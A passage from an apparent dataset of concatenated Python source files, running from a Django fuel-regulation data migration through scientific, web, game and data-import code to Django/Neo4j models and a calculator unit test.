provision = ProvisionOfTheAct.objects.create(
description="Prescribed carbon intensity",
display_order="1",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (a)"
)
ApprovedFuelProvision.objects.create(
fuel=ApprovedFuel.objects.get(name="Petroleum-based gasoline"),
provision_act=provision,
determination_type=prescribed_carbon_intensity
)
provision = ProvisionOfTheAct.objects.create(
description="Prescribed carbon intensity",
display_order="2",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (b)"
)
ApprovedFuelProvision.objects.create(
fuel=ApprovedFuel.objects.get(name="Petroleum-based diesel"),
provision_act=provision,
determination_type=prescribed_carbon_intensity
)
# other fuel types
approved_fuel_code = \
CarbonIntensityDeterminationType.objects.create(
display_order="2",
effective_date="2017-01-01",
the_type="Fuel Code"
)
fuel_types = ApprovedFuel.objects.exclude(
name__in=["Petroleum-based diesel", "Petroleum-based gasoline"]
)
# Section 6 (5) (c)
provision = ProvisionOfTheAct.objects.create(
description="Approved fuel code",
display_order="3",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (c)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=approved_fuel_code
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
# Section 6 (5) (d) (i)
default_carbon_intensity = \
CarbonIntensityDeterminationType.objects.create(
display_order="3",
effective_date="2017-01-01",
the_type="Default Carbon Intensity"
)
provision = ProvisionOfTheAct.objects.create(
description="Default Carbon Intensity Value",
display_order="4",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (d) (i)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=default_carbon_intensity
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
# Section 6 (5) (d) (ii) (A)
gh_genius = \
CarbonIntensityDeterminationType.objects.create(
display_order="4",
effective_date="2017-01-01",
the_type="GHGenius"
)
provision = ProvisionOfTheAct.objects.create(
description="GHGenius modelled",
display_order="5",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (d) (ii) (A)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=gh_genius
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
# Section 6 (5) (d) (ii) (B)
alternative_method = \
CarbonIntensityDeterminationType.objects.create(
display_order="5",
effective_date="2017-01-01",
the_type="Alternative"
)
provision = ProvisionOfTheAct.objects.create(
description="Alternative Method",
display_order="6",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (d) (ii) (B)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=alternative_method
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
TransactionType.objects.create(
the_type="Purchased",
display_order="1",
effective_date="2017-01-01"
)
TransactionType.objects.create(
the_type="Sold",
display_order="2",
effective_date="2017-01-01"
)
SigningAuthorityAssertion.objects.create(
description="I expect, on reasonable grounds, that any fuels "
"reported in Schedule C were used for a purpose other "
"than transport in accordance with section 6 (3) of "
"the *Greenhouse Gas Reduction (Renewable and Low "
"Carbon Fuel Requirements) Act*.",
display_order="1",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that records evidencing each matter "
"reported under sections 9 and 11.08 of the Renewable "
"and Low Carbon Fuel Requirements Regulation are "
"available on request.",
display_order="2",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that I am an officer or employee of the "
"fuel supplier, and that records evidencing my "
"authority to submit this report are available on "
"request.",
display_order="3",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that the information in this report is "
"true and complete to the best of my knowledge and I "
"understand that I may be required to provide to the "
"Director records evidencing the truth of that "
"information.",
display_order="4",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that records evidencing each matter "
"reported under section 11.032 (4) (b) or (c) of the "
"Renewable and Low Carbon Fuel Requirements "
"Regulation are available on request.",
display_order="1",
effective_date="2018-01-01",
module="exclusion_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that records evidencing my authority to "
"submit this report are available on request.",
display_order="2",
effective_date="2018-01-01",
module="exclusion_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that the information in this report is "
"true and complete to the best of my knowledge and I "
"understand that I may be required to provide to the "
"Director records evidencing the truth of that "
"information.",
display_order="3",
effective_date="2018-01-01",
module="exclusion_report"
)
except Exception as exc:
print(exc)
script_class = DockerEnvironment
|
999,433 | b7cb3e868a9fea5daa3ea58d4c55601c7cab0d81 | import requests
servers = ['https://paxos-1.herokuapp.com',
'https://paxos-2.herokuapp.com',
'https://paxos-3.herokuapp.com',
'https://paxos-4.herokuapp.com',
'https://paxos-5.herokuapp.com']
def check_values(key):
print('Checking values...')
for server in servers:
r = requests.get(server + '/listener/' + key)
print(server, r.status_code)
def make_propose(key, value):
server = servers[4]
r = requests.post(server + '/proposer/propose', json={"key": key, "value": value})
print(server, r.status_code, 'value:', value, 'succeeded:', r.text)
print('Sending one propose message')
key = 'test'
value = '1'
make_propose(key, value)
check_values(key)
|
999,434 | 347f94513e2d14bcb75f4fd817b45cb5b4606204 | # https://www.codewars.com/kata/take-a-picture/train/python
def sort_photos(pics):
years = [pic.split('.')[0] for pic in pics]
numbers = [int(pic.split('g')[-1]) for pic in pics]
data = sorted(zip(years, numbers))[-5:]
data.append((data[-1][0], data[-1][1] + 1))
return ['{}.img{}'.format(year, number) for year, number in data]
|
999,435 | 72998ff601e414c42815274b1a60c1e997cc0600 | import sys
from functools import reduce
with open(sys.argv[1]) as answer_fle:
group_answers = answer_fle.read().split('\n\n')
total1 = 0
total2 = 0
for group in group_answers:
all_answers = list(filter(None, group.split("\n")))
# for part one
total1 += len(set(''.join(all_answers)))
# for part two
intersection = reduce(lambda answer1, answer2: set.intersection(set(answer1), set(answer2)), all_answers)
total2 += len(intersection)
print(f'Part one: {total1}')
print(f'Part two: {total2}')
|
999,436 | 24cf1f1c4ab020d7e5aa47e63f0e29d160149ccc | key = input()
s = 56
i=0
pbox =[57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26,
18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52,
44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46,
38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5,
28, 20, 12, 4 ]
n = 64
input_table = key
binary_input_table = bin(int(input_table, 16))[2:].zfill(n)
output = ""
for p in pbox:
output+=binary_input_table[p-1]
i = 0
to_be_shifted= output
this_key=""
rotations = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
while(i<16):
left = to_be_shifted[:28]
right = to_be_shifted[28:]
#print(left+right)
"""if((rotations[i]) == 1):
print(to_be_shifted)
to_be_shifted = pep[1:] + pep[0]
print(to_be_shifted)
else:
print(to_be_shifted)
to_be_shifted = pep[2:] + pep[0] + pep[1]
print(to_be_shifted)"""
left = left[(rotations[i]):]+left[:(rotations[i])]
right = right[(rotations[i]):]+right[:(rotations[i])]
to_be_shifted = left + right
s = 48
pbox =[14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23,
19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52,
31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49,
39, 56, 34, 53, 46, 42, 50, 36, 29, 32]
n = 56
binary_input_table = to_be_shifted
output = ""
for p in pbox:
output+=binary_input_table[p-1]
k = hex(int(output, 2))[2:].zfill(12)
k = k.upper()
print(k)
i+=1
|
999,437 | 33a663f400c3152109bf51618d6b46ef1680210e | import os
from distutils.core import setup
def find_stubs(package):
stubs = []
for root, dirs, files in os.walk(package):
for file in files:
path = os.path.join(root, file).replace(package + os.sep, '', 1)
stubs.append(path)
return {package: stubs}
setup(
name="django-stubs",
url="https://github.com/mkurnikov/django-stubs.git",
author="Maksim Kurnikov",
author_email="maxim.kurnikov@gmail.com",
version="0.1.0",
license='BSD',
install_requires='Django>=2.1.1',
packages=['django-stubs'],
package_data=find_stubs('django-stubs')
)
|
999,438 | 19b9e1ed608da44db1ea1a667a40131728ab4042 | # -*- coding: utf-8 -*-
from rest_framework import serializers
from .models import User
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
exclude = ["password", "is_active", "is_staff", "is_superuser", "groups"]
read_only_fields = ["email"]
|
999,439 | 46e33e6d5fd35a2acd642f74d72ee731e14b03d8 | # -*- coding: utf-8 -*-
from types import SimpleNamespace
import numpy as np
from pyyeti import expmint
class SolveExp1(object):
"""
1st order ODE time domain solver based on the matrix exponential.
This class is for solving: ``yd - A y = f``
This solver is exact assuming either piece-wise linear or
piece-wise constant forces. See :class:`SolveExp2` for more
details on how this algorithm solves the ODE.
Examples
--------
Calculate impulse response of state-space system::
xd = A @ x + B @ u
y = C @ x + D @ u
where:
- force = 0's
- velocity(0) = B
.. plot::
:context: close-figs
>>> from pyyeti import ode
>>> from pyyeti.ssmodel import SSModel
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> f = 5 # 5 hz oscillator
>>> w = 2*np.pi*f
>>> w2 = w*w
>>> zeta = .05
>>> h = .01
>>> nt = 500
>>> A = np.array([[0, 1], [-w2, -2*w*zeta]])
>>> B = np.array([[0], [3]])
>>> C = np.array([[8, -5]])
>>> D = np.array([[0]])
>>> F = np.zeros((1, nt), float)
>>> ts = ode.SolveExp1(A, h)
>>> sol = ts.tsolve(B @ F, B[:, 0])
>>> y = C @ sol.d
>>> fig = plt.figure('Example')
>>> fig.clf()
>>> ax = plt.plot(sol.t, y.T,
... label='SolveExp1')
>>> ssmodel = SSModel(A, B, C, D)
>>> z = ssmodel.c2d(h=h, method='zoh')
>>> x = np.zeros((A.shape[1], nt+1), float)
>>> y2 = np.zeros((C.shape[0], nt), float)
>>> x[:, 0:1] = B
>>> for k in range(nt):
... x[:, k+1] = z.A @ x[:, k] + z.B @ F[:, k]
... y2[:, k] = z.C @ x[:, k] + z.D @ F[:, k]
>>> ax = plt.plot(sol.t, y2.T, label='discrete')
>>> leg = plt.legend(loc='best')
>>> np.allclose(y, y2)
True
Compare against scipy:
>>> from scipy import signal
>>> ss = ssmodel.getlti()
>>> tout, yout = ss.impulse(T=sol.t)
>>> ax = plt.plot(tout, yout, label='scipy')
>>> leg = plt.legend(loc='best')
>>> np.allclose(yout, y.ravel())
True
"""
def __init__(self, A, h, order=1):
"""
Instantiates a :class:`SolveExp1` solver.
Parameters
----------
A : 2d ndarray
The state-space matrix: ``yd - A y = f``
h : scalar or None
Time step or None; if None, the `E`, `P`, `Q` members will
not be computed.
order : scalar, optional
Specify which solver to use:
- 0 for the zero order hold (force stays constant across
time step)
- 1 for the 1st order hold (force can vary linearly across
time step)
Notes
-----
The class instance is populated with the following members:
======= =================================================
Member Description
======= =================================================
A the input `A`
h time step
n number of total DOF (``A.shape[0]``)
order order of solver (0 or 1; see above)
E, P, Q output of :func:`pyyeti.expmint.getEPQ`; they are
matrices used to solve the ODE
pc True if E, P, and Q member have been calculated;
False otherwise
======= =================================================
The E, P, and Q entries are used to solve the ODE::
for j in range(1, nt):
d[:, j] = E*d[:, j-1] + P*F[:, j-1] + Q*F[:, j]
"""
if h:
E, P, Q = expmint.getEPQ(A, h, order)
self.E = E
self.P = P
self.Q = Q
self.A = A
self.h = h
self.order = order
self.n = A.shape[0]
def tsolve(self, force, d0=None):
"""
Solve time-domain 1st order ODE equations.
Parameters
----------
force : 2d ndarray
The force matrix; ndof x time
d0 : 1d ndarray; optional
Displacement initial conditions; if None, zero ic's are
used.
Returns
-------
A record (SimpleNamespace class) with the members:
d : 2d ndarray
Displacement; ndof x time
v : 2d ndarray
Velocity; ndof x time
h : scalar
Time-step
t : 1d ndarray
Time vector: np.arange(d.shape[1])*h
"""
force = np.atleast_2d(force)
if force.shape[0] != self.n:
raise ValueError(
f"Force matrix has {force.shape[0]} rows; {self.n} rows are expected"
)
nt = force.shape[1]
d = np.zeros((self.n, nt)) # , float, order='F')
if d0 is not None:
d[:, 0] = d0
else:
d0 = np.zeros(self.n, float)
if nt > 1:
if not self.h:
raise RuntimeError("instantiate the class with a valid time step.")
# calc force term outside loop:
if self.order == 1:
PQF = self.P @ force[:, :-1] + self.Q @ force[:, 1:]
else:
PQF = self.P @ force[:, :-1]
E = self.E
for j in range(1, nt):
d0 = d[:, j] = E @ d0 + PQF[:, j - 1]
t = self.h * np.arange(nt)
else:
t = np.array([0.0])
return SimpleNamespace(d=d, v=force + self.A @ d, h=self.h, t=t)
|
999,440 | 54414d273853f30f4ca8f951b6c1e36ce9ca8250 | # pass the name of dataset you want to check for existence and bigquery client object
def exists(dataset_name,client):
dataset_names_list = []
for dataset in client.list_datasets():
#print dataset
d_name = dataset.dataset_id.encode('ascii','ignore')
dataset_names_list.append(d_name)
if dataset_name in dataset_names_list:
return "exists"
else:
return "doesn't exists"
|
999,441 | 3d73053b479c2efdabd39fb6fbb62d877389cd66 |
def solve():
print("magna")
# converting the number into tsh
profit_margin=200000*2290
# percentage cut for profit
p_cut1=0.005
p_cut2=0.0025
number_transaction1=812000
number_transaction2=50000
#
sales_1=number_transaction1*p_cut1
sales_2=number_transaction2*p_cut2
#
tcap=3000000
v2 =(profit_margin -((sales_1)*(tcap)))/(sales_2-sales_1)
v1=tcap-v2
print("v1: {} :Transactions: {} : Percentage: {} AmountCut {}".format(round(v1),number_transaction1, p_cut1,round(p_cut1*v1)))
print(" v2 :{} :Transactions: {} : Percentage: {} AmountCut {}".format(round(v2),number_transaction2,p_cut2,round(p_cut2*v2)))
if is_correct(v1,v2,tcap,sales_1,sales_2,profit_margin):
print('okay')
else:
print('cha kike')
def is_correct(v1,v2,tcap,sales_1,sales_2,profit_margin):
if ((tcap == v1+v2) and (profit_margin == round((sales_1*v1 + sales_2*v2)))):
return True
else:
return False
def sove_higher_orde_eq():
import numpy as np
#
# a = np.array([[3,1], [1,2]])
# b = np.array([9,8])
# eq1=[(0.02*250000),(0.01*200000),(0.005*150000),(0.002*100000),(0.001*50000),(0.0005*25000),(0.0002*10000),(0.00025*5000)]
# true equation
# eq1=[(0.02*5000),(0.02*10000),(0.01*25000),(0.007*50000),(0.004*100000),(0.002*150000),(0.0014*200000),(0.0012*250000)]
# 11 variables, new day
# eq1=[(0.02*250000),(0.01*200000),(0.005*150000),(0.002*100000),(0.001*50000),(0.0005*25000),(0.0002*10000),(0.0001*5000),(0.00005*2500),(0.000025*1250),(0.0000125*625)]
# percentage_cut={"fivek":0.02,"tenk":0.01,"twentyk":0.005,"fourtyk":0.002,"fiftyk":0.001,"onehundredk":0.0005,"twohundredk":0.0002,"threehundredk":0.0001,"fourhundredk":0.00005,"fivehundredk":0.000025,"onethousandk":0.0000125}
percentage_cut={"fivek":0.02,"tenk":0.01,"twentyk":0.005,"fourtyk":0.004,"fiftyk":0.005,"onehundredk":0.005,"twohundredk":0.005,"threehundredk":0.005,"fourhundredk":0.004,"fivehundredk":0.002,"onethousandk":0.001}
# number_of_transactions=[{"twentyk"}250000,{"twentyk"}200000,{"twentyk"}200000,{"twentyk"}150000,{"twentyk"}100000,{"twentyk"}50000,{"twentyk"}25000,{"twentyk"}10000,{"twentyk"}5000,{"twentyk"}2500,{"twentyk"}1250,{"twentyk"}625]
number_of_transactions={"fivek":180000,"tenk":100000,"twentyk":100000,"fourtyk":100000,"fiftyk":100000,"onehundredk":150000,"twohundredk":50000,"threehundredk":40000,"fourhundredk":20000,"fivehundredk":2500,"onethousandk":1250}
# eq1=[(0.02*250000),(0.01*200000),(0.005*150000),(0.002*100000),(0.001*50000),(0.0005*25000),(0.0002*10000),(0.0001*5000),(0.00005*2500),(0.000025*1250),(0.0000125*625)]
eq1=[]
for index in percentage_cut:
for index2 in number_of_transactions:
if(index2==index):
eq1.append(percentage_cut[index]*number_of_transactions[index2])
# eq2=[1,1,1,1,1,1,1,1,1,1,1]
eq3=[-1,1,0,0,0,0,0,0,0,0,0]
eq4=[0,-1,1,0,0,0,0,0,0,0,0]
eq5=[0,0,-1,1,0,0,0,0,0,0,0]
eq6=[0,0,0,-1,1,0,0,0,0,0,0]
eq7=[0,0,0,0,-1,1,0,0,0,0,0]
eq8=[0,0,0,0,0,-1,1,0,0,0,0]
eq9=[0,0,0,0,0,0,-1,1,0,0,0]
eq10=[0,0,0,0,0,0,0,-1,1,0,0]
eq11=[0,0,0,0,0,0,0,0,-1,1,0]
eq_v1=[1,0,0,0,0,0,0,0,0,0,0]
a = np.array([eq1, eq11,eq3,eq4,eq5,eq6,eq7,eq8,eq9,eq10,eq_v1])
b = np.array([200000*2290,500000,5000,10000,30000,50000,100000,100000,100000,100000,5000])
x = np.linalg.solve(a, b)
total_number_of_transactions=0
temp=0
for index,value in enumerate(percentage_cut):
for index2,value2 in enumerate(number_of_transactions):
for index3,value3 in enumerate(x):
if(index==index2==index3):
temp+=percentage_cut[value]*value3*number_of_transactions[value2]/2290
print("Amount:Tsh {} :P_Co:$ {}: Transactions {} : % {} : Cut {} ".format(round(value3),round(temp),number_of_transactions[value2],percentage_cut[value],round(percentage_cut[value]*value3)))
total_number_of_transactions+=number_of_transactions[value2]
# print(x)
print("Total Number of Transactions {}".format(total_number_of_transactions))
sove_higher_orde_eq()
# print('old ')
# solve()
|
999,442 | a799f05ef5f17eeffcdf849d2b1dea1e3bde66cb | from onnx_tf.handlers.frontend_handler import FrontendHandler
from onnx_tf.handlers.handler import onnx_op
from onnx_tf.handlers.handler import tf_op
from .math_mixin import BasicMathMixin
@onnx_op("Floor")
@tf_op("Floor")
class Floor(BasicMathMixin, FrontendHandler):
@classmethod
def version_1(cls, node, **kwargs):
return cls.basic_math_op(node, **kwargs)
@classmethod
def version_6(cls, node, **kwargs):
return cls.basic_math_op(node, **kwargs)
|
999,443 | 57f077f94e55909bd9128699f80d6a5d4eed5155 | #!/usr/bin/python
from cydmx import dmxwidget
import math
import random
class SurfBall (dmxwidget.Widget) :
def init(self, panel) :
self.hue = 0.9
self.center_x=0.0
self.center_y=0.0
self.dx=0.4
self.dy=0.5
def draw(self, panel) :
self.center_x+=self.dx
self.center_y+=self.dy
if self.center_x>(panel.width-1):
self.dx = -self.dx #+ (0.5 - random.random())/10.
self.center_x = panel.width - 1
elif self.center_x<0:
self.dx = -self.dx #+ (0.5 - random.random())/10
self.center_x = 0
if self.center_y>(panel.height-1):
self.dy = -self.dy #+ (0.5 - random.random())/10
self.center_y = panel.height - 1
elif self.center_y<0:
self.dy=-self.dy #+ (0.5 - random.random())/10
self.center_y = 0
for row in xrange(panel.height):
for column in xrange(panel.width):
setColor(panel, self.hue, self.center_x, self.center_y, row, column)
panel.outputAndWait(30)
def colorset(panel, hue, brightness, x, y):
panel.lights[int(y)][int(x)].sethue(hue, brightness, 0)
def setColor(panel, hue, x, y, row, col):
hs = 3 # hue variance
bs = 5 # brightness variance
ss = 3 # saturation variance
dist = math.sqrt((x - col)**2. + (y - row)**2)
#panel.lights[row][col].sethue(hue/(1 + 0.4*dist), 2/(0.05 + dist), 0)
pointhue = 2*hs*math.exp(-dist**2/(2*hs**2))/(hs*math.sqrt(2*math.pi))
pointbrightness = 3*bs*math.exp(-dist**2/(2*bs**2))/(bs*math.sqrt(2*math.pi))
pointsat = 1/(1+dist**2)
#pointsat = ss*math.exp(-dist**2/(2*ss**2))/(ss*math.sqrt(2*math.pi))
panel.lights[row][col].sethue(pointhue, pointbrightness, pointsat)
def clear(panel):
for row in panel.lights:
for light in row:
light.sethue(0, 0, 0)
if __name__=="__main__" :
dmxwidget.WidgetServer().run([SurfBall])
|
999,444 | 27951f294851f0a001069a4c37fc8d29bfdb8a77 | import pygame
import sys
from pygame.locals import *
pygame.init()
screen=pygame.display.set_mode((600,500))
pygame.display.set_caption("Drawing A Line")
while True :
for event in pygame.event.get():
if event.type==QUIT:
sys.exit()
screen.fill((0,80,0))
#draw the line
color=100,255,200
width=8
pygame.draw.line(screen,color,(100,100),(500,400),width)
pygame.display.update()
|
999,445 | d1ade014f5827eb0f4e000fac225d683558f51b8 | from django.core.management.base import BaseCommand
from django.db.models import Q
from animals.models import Animal, Person, Location
from datetime import datetime
import xlrd
from xlrd import xldate_as_datetime
class Command(BaseCommand):
help = 'Import existing data from mice2giveaway excel list'
def add_arguments(self, parser):
parser.add_argument('filename', nargs='+', type=str)
def handle(self, *args, **options):
lines_count = 0
fname = options['filename'][0]
xl = xlrd.open_workbook(fname) # Open the workbook
# for sheet in (2,0):
for sheet in (0,):
print('Sheet #' + str(sheet))
xl_sheet = xl.sheet_by_index(sheet) # grab sheet
num_cols = xl_sheet.ncols # Number of columns
for row_idx in range(1, xl_sheet.nrows): # Iterate through rows
print('.', end ="", flush=True)
# print ('-'*40)
# print ('Row: %s' % row_idx) # Print row number
# for col_idx in range(0, num_cols): # Iterate through columns
# cell_obj = xl_sheet.cell(row_idx, col_idx) # Get cell object by row, col
# print ('Column: [%s] cell_obj: [%s]' % (col_idx, cell_obj))
a = Animal()
# a.pk = int(xl_sheet.cell(row_idx, 0).value)
#a.entry_date = xldate_as_datetime(xl_sheet.cell(row_idx, 1).value, xl.datemode)
#a.available_from = xldate_as_datetime(xl_sheet.cell(row_idx, 0).value, xl.datemode) # angeboten am
a.animal_type = 'fish'
a.available_from = datetime.today().date()
a.comment = str(xl_sheet.cell(row_idx, 0).value).strip() # Geschlecht
a.sex = str(xl_sheet.cell(row_idx, 1).value).strip().lower() or 'u' # Geschlecht
a.line = str(xl_sheet.cell(row_idx, 2).value).strip() # Zuchtlinie
a.lab_id = str(xl_sheet.cell(row_idx, 3).value).strip() # Käfig-ID
a.database_id = str(xl_sheet.cell(row_idx, 4).value).strip() # Tier-ID
a.day_of_birth = xldate_as_datetime(xl_sheet.cell(row_idx, 5).value, xl.datemode) #Geb.
a.amount = int(xl_sheet.cell(row_idx, 7).value) # Anzahl
a.licence_number = str(xl_sheet.cell(row_idx, 11).value).strip() # Aktenzeichen
location_name = str(xl_sheet.cell(row_idx, 13).value).strip() # Raum
responsible_person = str(xl_sheet.cell(row_idx, 16).value).strip().strip() # Verantwortliche Person
#a.available_from = xldate_as_datetime(xl_sheet.cell(row_idx, 19).value, xl.datemode)
a.available_to = xldate_as_datetime(xl_sheet.cell(row_idx, 22).value, xl.datemode)
#a.new_owner = str(xl_sheet.cell(row_idx, 21).value).strip()
# a.organ_type = 'whole animal'
#a.mutations =
try:
a.location = Location.objects.get(name=location_name)
except Location.DoesNotExist:
loc = Location(name=location_name)
loc.save()
a.location = loc
a.responsible_person = Person.objects.get(Q(email=responsible_person.lower()) | Q(name__iexact=responsible_person.lower()))
try:
Animal.objects.get(entry_date=a.entry_date,
day_of_birth=a.day_of_birth,
available_from=a.available_from,
available_to=a.available_to,
line=a.line,
database_id=a.database_id,
lab_id=a.lab_id,
location=a.location,
sex=a.sex)
except Animal.DoesNotExist:
a.save()
lines_count += 1
print()
self.stdout.write(self.style.SUCCESS('Successfully imported %i lines.' % lines_count))
|
999,446 | f2b9870cab764e5026f29b34973e17693057418e | """locum URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from patron.views import PatronViewSet, CheckoutViewSet
from harvest.views import WorkRecordViewSet, BibliographicRecordViewSet
from ratings.views import WishViewSet, RatingViewSet, ReviewViewSet
from tags.views import TagViewSet, LabelViewSet
router = routers.DefaultRouter()
router.register(r'patrons', PatronViewSet)
router.register(r'checkouts', CheckoutViewSet, base_name='checkouts')
router.register(r'works', WorkRecordViewSet)
router.register(r'bibs', BibliographicRecordViewSet)
router.register(r'wishes', WishViewSet)
router.register(r'ratings', RatingViewSet)
router.register(r'reviews', ReviewViewSet)
router.register(r'tags', TagViewSet)
router.register(r'labels', LabelViewSet)
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^search/', include('search.urls', namespace="search")),
]
urlpatterns += router.urls
|
999,447 | 22439165fb41cb1f4418054c8981772a92165e2c | from Actions.Quit import QuitAction
from Actions.ActionManager import ActionManager
|
999,448 | feb95362d8a1788007a470db093237bae9b3ec05 | # simultaneous reading and writing to a file in python
queue
|
999,449 | 2bd3cd2e89478ab46588c277f3f0c6fb635983f3 | # 导入unittest
import unittest
from funcdemo.CalcDemo import Calc
from Commonlib.ReadXml import readXml
# # 创建对象
# r = readXml()
# a = int(r.read_xml("../DataXml/data.xml","jia","num1"))
# b = int(r.read_xml("../DataXml/data.xml","jia","num2"))
# ex = int(r.read_xml("../DataXml/data.xml","jia","expect"))
# 优化
r = readXml()
# 继承
class Test1(unittest.TestCase):
# 初始化函数
def setUp(self):
print("开始")
# 结结束函数
def tearDown(self):
print("结束")
def test001(self):
#创建对象
ca = Calc()
res1 = ca.jia(int(r.read_xml("../DataXml/data.xml","jia","num1")),int(r.read_xml("../DataXml/data.xml","jia","num2")))
# 判断
self.assertEqual(res1,int(r.read_xml("../DataXml/data.xml","jia","expect")))
def test002(self):
# 创建对象
ca = Calc()
res2 = ca.jian(int(r.read_xml("../DataXml/data.xml","jian","num1")),int(r.read_xml("../DataXml/data.xml","jian","num2")))
#进行比对
self.assertEqual(res2,int(r.read_xml("../DataXml/data.xml","jian","expect")))
if __name__ == '__main__':
unittest.main()
|
999,450 | aec584327831b44545169d3b8aa26b1ccce6a97b | # Library of functions to list, download and save ECCC Precipitation data
# Andrew Ireson
# 17-March-2020
import pandas as pd
import matplotlib.pyplot as pl
import numpy as np
def StationList():
return pd.read_csv('ECCC_Precip/Station Inventory EN.csv',skiprows=3)
def SearchByProvince(SearchTerm,stations):
provs=stations['Province']
i=[count for count, prov in enumerate(provs) if SearchTerm.lower() in prov.lower()]
provsfound=sorted(set(provs[i]))
if len(provsfound)>1:
print('Multiple provinces found - consider improving your search term')
print('%d stations found'%(len(stations.iloc[i])))
elif len(provsfound)==0:
print('No provinces found - improve your search term')
else:
print('%d stations found in province %s'%(len(stations.iloc[i]),provsfound[0]))
return stations.iloc[i]
def SearchByName(SearchTerms,stations):
names=stations['Name']
i=[]
for SearchTerm in SearchTerms:
j=[count for count, name in enumerate(names) if SearchTerm.lower() in name.lower()]
if i==[]:
i=j
else:
i=[ind for ind in j if ind in i]
PrintSummary(stations.iloc[i])
return stations.iloc[i]
def PrintSummary(stations):
print('%d stations found'%len(stations))
print(38*' '+'Station name: Station ID From To ')
for a,b,c,d in zip(stations['Name'],stations['Station ID'],stations['First Year'],stations['Last Year']): print('%50s: %s %d %d'%(a,b,c,d))
def GetURL(StationID,Year):
url_template='https://climate.weather.gc.ca/climate_data/bulk_data_e.html?format=csv&stationID=XXX_StationID&Year=XXX_Year&timeframe=2&submit=%20Download+Data'
MyURL=url_template.replace('XXX_StationID',StationID)
MyURL=MyURL.replace('XXX_Year','%04d' % Year)
return MyURL
def PreviewData(StationID,Year):
print("downloading %4d" % Year)
df=GetDataFrame(GetURL(StationID,Year))
print(df.head())
return
def GetDataFrame(MyURL):
df=pd.read_csv(MyURL, index_col='Date/Time', parse_dates=True, encoding='latin1')
return df
def GetAllData(StartYear,EndYear,StationID):
Years = np.arange(StartYear,EndYear+1)
print("downloading %4d" % StartYear)
df=GetDataFrame(GetURL(StationID,Years[0]))
weather=df[['Total Rain (mm)','Total Snow (cm)','Total Precip (mm)']]
n=len(Years)
for i in range(1,n):
print("downloading %4d" % Years[i])
df=GetDataFrame(GetURL(StationID,Years[i]))
df=df[['Total Rain (mm)','Total Snow (cm)','Total Precip (mm)']]
weather=pd.concat([weather,df])
return weather
|
999,451 | ab71ac2567febe2da5ad950919b6e7f2de12ade6 | from django.db import models
# from django.core.urlresolvers import reverse (Descontinuado)
from django.urls import reverse
from systemgrafo.neo4japp import db
# Create your models here.
class NodeHandle(models.Model):
handle_id = models.CharField(max_length=64, unique=True, editable=False)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
def __str__(self):
return 'NodeHandle for node %d' % self.node()['handle_id']
def node(self):
return db.get_node(self.handle_id, self.__class__.__name__)
def delete(self, **kwargs):
"""Delete that node handle and the handles node."""
db.delete_node(self.handle_id, self.__class__.__name__)
super(NodeHandle, self).delete()
return True
delete.alters_data = True
class Protein(NodeHandle):
def __str__(self):
return self.name
def _name(self):
try:
return self.node().properties.get('name', 'Missing title')
except AttributeError:
return 'Nó ausente?'
name = property(_name)
def get_absolute_url(self):
return reverse('protein-detail', args=[str(self.id)])
def _codif_protein(self):
genes = []
for gene in db.get_directors(self.handle_id):
genes.append({'gene': Gene.objects.get(handle_id=gene['handle_id'])})
return genes
codif_protein = property(_codif_protein)
class Gene(NodeHandle):
def __str__(self):
return self.name
def _name(self):
try:
return self.node().properties.get('name', 'Missing name')
except AttributeError:
return 'Nó ausente?'
name = property(_name)
def get_absolute_url(self):
return reverse('gene-detail', args=[str(self.id)])
def _proteins(self):
proteins = []
for protein in db.get_proteins(self.handle_id):
proteins.append({'protein': Protein.objects.get(handle_id=protein['handle_id']),
'relationships': protein['relationships']})
return proteins
proteins = property(_proteins)
|
999,452 | 12c37cb28440fc4034800d5df782621fb8c42557 | import pymongo
